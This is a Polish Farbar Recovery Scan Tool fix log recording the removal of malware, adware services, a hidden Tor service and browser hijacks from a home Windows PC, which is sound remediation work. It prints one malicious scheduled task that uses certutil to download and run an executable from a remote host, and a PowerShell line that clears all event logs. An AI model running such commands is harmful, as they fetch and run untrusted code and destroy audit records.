Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 16.05.2018 01 Uruchomiony przez Bartek (22-05-2018 22:58:17) Run:4 Uruchomiony z C:\Users\Bartek\Downloads Załadowane profile: Bartek (Dostępne profile: Bartek) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** Task: {4600FA77-1D45-4116-975F-9B2ADD20CDB1} - System32\Tasks\MRT => C:\Users\Bartek\AppData\Local\Temp\csrss\mrt.exe [2018-05-22] () <==== UWAGA Task: {47C5BB9A-FCB4-477E-844D-18572951D8A9} - System32\Tasks\{56587220-312E-41C2-8F2C-2A86F3DA23AF} => C:\Windows\system32\pcalua.exe -a "E:\Bartek\Gry\Heroes 5\Heroes of Might & Magic V - Dzikie Hordy\Patche\heroes_might_magic_5_3.01_pl.exe" -d "E:\Bartek\Gry\Heroes 5\Heroes of Might & Magic V - Dzikie Hordy\Patche" Task: {ABDB4510-54FD-476C-97F9-8E68A1BFB964} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-05-21] () <==== UWAGA Task: {BDF11CB4-5603-408F-B9B3-36B5804EE85F} - System32\Tasks\{D2DE5D13-9581-4CB6-A3AE-A21E739A4BCA} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Common Files\Doublebam\uninstall.exe" -d "C:\Program Files (x86)\Common Files\Doublebam" Task: {C8B15871-9EBF-4859-B0D4-2D6951174F51} - System32\Tasks\vgokv => C:\Users\Bartek\AppData\Roaming\zmzol\vgokv.vbs [2018-05-21] () Task: {F1AA8920-6EFA-400E-B69E-BC88E72E1BF7} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/3/app.exe C:\Users\Bartek\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Bartek\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA ShortcutWithArgument: C:\Users\Bartek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP% ShortcutWithArgument: C:\Users\Bartek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikacje Chrome\GeForce Experience Stream Client.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=gjljknijpnfibppaijefibndmiabonep ShortcutWithArgument: C:\Users\Bartek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP% ShortcutWithArgument: C:\Users\Bartek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP% ShortcutWithArgument: C:\Users\Bartek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP% ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP% ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> %SNF% 2018-05-21 14:17 - 2018-05-21 14:17 - 001377280 ____H () C:\Windows\windefender.exe 2018-05-21 14:17 - 2018-05-21 14:17 - 003173376 _____ () C:\Windows\rss\csrss.exe 2018-05-22 14:30 - 2018-05-22 14:30 - 001484800 _____ () C:\Users\Bartek\AppData\Local\Temp\csrss\mrt.exe 2018-05-22 14:25 - 2018-05-22 16:22 - 001042432 _____ () C:\Users\Bartek\AppData\Local\Temp\wup\wup.exe FirewallRules: [{2ACB2E51-F44F-4B45-86EB-036C715673A1}] => (Allow) C:\Users\Bartek\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe FirewallRules: [{C9F64007-2362-4FDC-8AB9-A760F4710803}] => (Allow) C:\Windows\rss\csrss.exe HKU\S-1-5-21-360975752-3786565279-1083807947-1001\...\Run: [DampField] => C:\Windows\rss\csrss.exe [3173376 2018-05-21] () <==== UWAGA HKU\S-1-5-21-360975752-3786565279-1083807947-1001\...\Run: [CloudNet] => C:\Users\Bartek\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-05-22] (EpicNet Inc.) AppInit_DLLs: C:\ProgramData\Quoteex\PhysTrax.dll => Brak pliku AppInit_DLLs-x32: C:\ProgramData\Quoteex\Keytech.dll => Brak pliku RemoveDirectory: C:\Users\Bartek\AppData\Roaming\zmzol RemoveDirectory: C:\Users\Bartek\AppData\Roaming\EpicNet Inc RemoveDirectory: C:\ProgramData\Quoteex RemoveDirectory: C:\ProgramData\yahoochrome_D Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} HKU\S-1-5-21-360975752-3786565279-1083807947-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccYoyDn3q68ALnTQQwq7elzZwgmnz37qXoKhUCvHsN1GiZZCF3m4prTM0mR0VaGpCldMNZ2yT4d0dQ-2XtvxvzBOfgsX2V7Wo8kvXF6diHO8ce3R6fmB01wcrP3yuOlyBsZrAfH4BM1jAIVRFwUG6cUutR_PWg,,&q={searchTerms} HKU\S-1-5-21-360975752-3786565279-1083807947-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccYoyDn3q68ALnTQQwq7elzZwgmnz37qXoKhUCvHsN1GiZZCF3m4prTM0mR0VaGpCldA6aBH6SIyVUPUh0wIUYP-LrkzKT5owTrePODdncsK8256r86EEWsnA0mQHR4-cGWxQKLkSYc_r8Ka08qQPHOnoG7wNw,, SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccYoyDn3q68ALnTQQwq7elzZwgmnz37qXoKhUCvHsN1GiZZCF3m4prTM0mR0VaGpCldMNZ2yT4d0dQ-2XtvxvzBOfgsX2V7Wo8kvXF6diHO8ce3R6fmB01wcrP3yuOlyBsZrAfH4BM1jAIVRFwUG6cUutR_PWg,,&q={searchTerms} SearchScopes: HKU\S-1-5-21-360975752-3786565279-1083807947-1001 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccYoyDn3q68ALnTQQwq7elzZwgmnz37qXoKhUCvHsN1GiZZCF3m4prTM0mR0VaGpCldMNZ2yT4d0dQ-2XtvxvzBOfgsX2V7Wo8kvXF6diHO8ce3R6fmB01wcrP3yuOlyBsZrAfH4BM1jAIVRFwUG6cUutR_PWg,,&q={searchTerms} SearchScopes: HKU\S-1-5-21-360975752-3786565279-1083807947-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccYoyDn3q68ALnTQQwq7elzZwgmnz37qXoKhUCvHsN1GiZZCF3m4prTM0mR0VaGpCldMNZ2yT4d0dQ-2XtvxvzBOfgsX2V7Wo8kvXF6diHO8ce3R6fmB01wcrP3yuOlyBsZrAfH4BM1jAIVRFwUG6cUutR_PWg,,&q={searchTerms} CHR Extension: (Bazz Search) - C:\Users\Bartek\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmeinlfojlcegblpogpjbhipmonclejh [2018-05-21] R2 WinDefender; C:\Windows\windefender.exe [1377280 2018-05-21] () S2 backlh; C:\ProgramData\Logic Cramble\set.exe [X] <==== UWAGA S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X] S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X] S2 Quoteex; C:\ProgramData\\Quoteex\\Quoteex.exe shuz -f "C:\ProgramData\\Quoteex\\Quoteex.dat" -l -a <==== UWAGA S2 saiyitechnology; C:\ProgramData\yahoochrome_D\desktop215.exe [X] R2 TCPSvc; "C:\Users\Bartek\AppData\Local\Temp\csrss\proxy\Tor\tor.exe" --nt-service --SocksPort 7050 --Log "notice file C:\Users\Bartek\AppData\Local\Temp\csrss\proxy\t" <==== UWAGA 2018-05-21 14:17 - 2018-05-21 14:17 - 000000000 ___HD C:\Windows\rss 2018-05-21 14:16 - 2018-05-21 14:17 - 000015606 _____ C:\Windows\SysWOW64\findit.xml 2018-05-21 14:16 - 2018-05-21 14:16 - 007611392 _____ C:\Users\Bartek\AppData\Local\agent.dat 2018-05-21 14:16 - 2018-05-21 14:16 - 001987035 _____ C:\Users\Bartek\AppData\Local\Vaiaquophase.tst 2018-05-21 14:16 - 2018-05-21 14:16 - 001895382 _____ C:\Users\Bartek\AppData\Local\X-find.bin 2018-05-21 14:16 - 2018-05-21 14:16 - 000278508 _____ C:\Users\Bartek\AppData\Local\Toneco.tst 2018-05-21 14:16 - 2018-05-21 14:16 - 000126464 _____ C:\Users\Bartek\AppData\Local\noah.dat 2018-05-21 14:16 - 2018-05-21 14:16 - 000070896 _____ C:\Users\Bartek\AppData\Local\Config.xml 2018-05-21 14:16 - 2018-05-21 14:16 - 000018432 _____ C:\Users\Bartek\AppData\Local\Main.dat 2018-05-21 14:16 - 2018-05-21 14:16 - 000005568 _____ C:\Users\Bartek\AppData\Local\md.xml 2018-05-21 14:16 - 2018-05-21 14:15 - 002136576 _____ (TODO: ) C:\Users\Bartek\AppData\Local\Vaiaquophase.exe 2018-05-21 14:16 - 2018-05-21 14:15 - 002136576 _____ (TODO: ) C:\Users\Bartek\AppData\Local\Toneco.exe EmptyTemp: ***************** "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{4600FA77-1D45-4116-975F-9B2ADD20CDB1}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4600FA77-1D45-4116-975F-9B2ADD20CDB1}" => pomyślnie usunięto C:\Windows\System32\Tasks\MRT => pomyślnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MRT" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{47C5BB9A-FCB4-477E-844D-18572951D8A9}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{47C5BB9A-FCB4-477E-844D-18572951D8A9}" => pomyślnie usunięto C:\Windows\System32\Tasks\{56587220-312E-41C2-8F2C-2A86F3DA23AF} => pomyślnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{56587220-312E-41C2-8F2C-2A86F3DA23AF}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{ABDB4510-54FD-476C-97F9-8E68A1BFB964}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{ABDB4510-54FD-476C-97F9-8E68A1BFB964}" => pomyślnie usunięto C:\Windows\System32\Tasks\csrss => pomyślnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BDF11CB4-5603-408F-B9B3-36B5804EE85F}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BDF11CB4-5603-408F-B9B3-36B5804EE85F}" => pomyślnie usunięto C:\Windows\System32\Tasks\{D2DE5D13-9581-4CB6-A3AE-A21E739A4BCA} => pomyślnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{D2DE5D13-9581-4CB6-A3AE-A21E739A4BCA}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{C8B15871-9EBF-4859-B0D4-2D6951174F51}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C8B15871-9EBF-4859-B0D4-2D6951174F51}" => pomyślnie usunięto C:\Windows\System32\Tasks\vgokv => pomyślnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\vgokv" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{F1AA8920-6EFA-400E-B69E-BC88E72E1BF7}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F1AA8920-6EFA-400E-B69E-BC88E72E1BF7}" => pomyślnie usunięto C:\Windows\System32\Tasks\ScheduledUpdate => pomyślnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate" => pomyślnie usunięto C:\Users\Bartek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk => Skrót - argument pomyślnie usunięto C:\Users\Bartek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikacje Chrome\GeForce Experience Stream Client.lnk => Skrót - argument pomyślnie usunięto C:\Users\Bartek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk => Skrót - argument pomyślnie usunięto C:\Users\Bartek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk => Skrót - argument pomyślnie usunięto C:\Users\Bartek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk => Skrót - argument pomyślnie usunięto C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => Skrót - argument pomyślnie usunięto C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk => Skrót - argument pomyślnie usunięto C:\Windows\windefender.exe => pomyślnie przeniesiono C:\Windows\rss\csrss.exe => pomyślnie przeniesiono C:\Users\Bartek\AppData\Local\Temp\csrss\mrt.exe => pomyślnie przeniesiono C:\Users\Bartek\AppData\Local\Temp\wup\wup.exe => pomyślnie przeniesiono "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{2ACB2E51-F44F-4B45-86EB-036C715673A1}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{C9F64007-2362-4FDC-8AB9-A760F4710803}" => pomyślnie usunięto "HKU\S-1-5-21-360975752-3786565279-1083807947-1001\Software\Microsoft\Windows\CurrentVersion\Run\\DampField" => pomyślnie usunięto "HKU\S-1-5-21-360975752-3786565279-1083807947-1001\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => pomyślnie usunięto "C:\ProgramData\Quoteex\PhysTrax.dll" => Dane wartości pomyślnie usunięto "C:\ProgramData\Quoteex\Keytech.dll" => Dane wartości pomyślnie usunięto "C:\Users\Bartek\AppData\Roaming\zmzol" => pomyślnie usunięto "C:\Users\Bartek\AppData\Roaming\EpicNet Inc" => pomyślnie usunięto "C:\ProgramData\Quoteex" => nie znaleziono "C:\ProgramData\yahoochrome_D" => nie znaleziono ========= wevtutil el | Foreach-Object {wevtutil cl "$_"} ========= ========= Koniec Powershell: ========= HKU\S-1-5-21-360975752-3786565279-1083807947-1001\Software\Microsoft\Internet Explorer\Main\\Search Page => Wartość pomyślnie przywrócono HKU\S-1-5-21-360975752-3786565279-1083807947-1001\Software\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\ielnksrch" => pomyślnie usunięto HKLM\Software\Wow6432Node\Classes\CLSID\ielnksrch => nie znaleziono "HKU\S-1-5-21-360975752-3786565279-1083807947-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => pomyślnie usunięto "HKU\S-1-5-21-360975752-3786565279-1083807947-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{ielnksrch}" => pomyślnie usunięto HKLM\Software\Classes\CLSID\{ielnksrch} => nie znaleziono CHR Extension: (Bazz Search) - C:\Users\Bartek\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmeinlfojlcegblpogpjbhipmonclejh [2018-05-21] => Błąd: Nie znaleziono automatycznej naprawy dla tego wejścia. WinDefender => Nie można zatrzymać usługi. "HKLM\System\CurrentControlSet\Services\WinDefender" => pomyślnie usunięto WinDefender => serwis pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\backlh" => pomyślnie usunięto backlh => serwis pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\gupdate" => pomyślnie usunięto gupdate => serwis pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\gupdatem" => pomyślnie usunięto gupdatem => serwis pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\Quoteex" => pomyślnie usunięto Quoteex => serwis pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\saiyitechnology" => pomyślnie usunięto saiyitechnology => serwis pomyślnie usunięto TCPSvc => Nie można zatrzymać usługi. "HKLM\System\CurrentControlSet\Services\TCPSvc" => pomyślnie usunięto TCPSvc => serwis pomyślnie usunięto "C:\Windows\rss" folder - przenoszenie: Nie można przenieść "C:\Windows\rss" => Zaplanowany do przeniesienia przy restarcie. C:\Windows\SysWOW64\findit.xml => pomyślnie przeniesiono C:\Users\Bartek\AppData\Local\agent.dat => pomyślnie przeniesiono C:\Users\Bartek\AppData\Local\Vaiaquophase.tst => pomyślnie przeniesiono C:\Users\Bartek\AppData\Local\X-find.bin => pomyślnie przeniesiono C:\Users\Bartek\AppData\Local\Toneco.tst => pomyślnie przeniesiono C:\Users\Bartek\AppData\Local\noah.dat => pomyślnie przeniesiono C:\Users\Bartek\AppData\Local\Config.xml => pomyślnie przeniesiono C:\Users\Bartek\AppData\Local\Main.dat => pomyślnie przeniesiono C:\Users\Bartek\AppData\Local\md.xml => pomyślnie przeniesiono C:\Users\Bartek\AppData\Local\Vaiaquophase.exe => pomyślnie przeniesiono C:\Users\Bartek\AppData\Local\Toneco.exe => pomyślnie przeniesiono =========== EmptyTemp: ========== BITS transfer queue => 0 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 33644323 B Java, Flash, Steam htmlcache => 55497574 B Windows/system/drivers => 7386139 B Edge => 0 B Chrome => 85447054 B Firefox => 0 B Opera => 0 B Temp, IE cache, history, cookies, recent: Users => 0 B Default => 0 B Public => 0 B ProgramData => 0 B systemprofile => 128 B systemprofile32 => 0 B LocalService => 0 B NetworkService => 17356 B Bartek => 187845944 B RecycleBin => 3676883077 B EmptyTemp: => 3.8 GB danych tymczasowych Usunięto. ================================ Rezultat przenoszenia plików przy restarcie (Tryb startu: Normal) (Data i godzina: 22-05-2018 23:02:19) C:\Windows\rss => pomyślnie przeniesiono ==== Koniec Fixlog 23:02:19 ====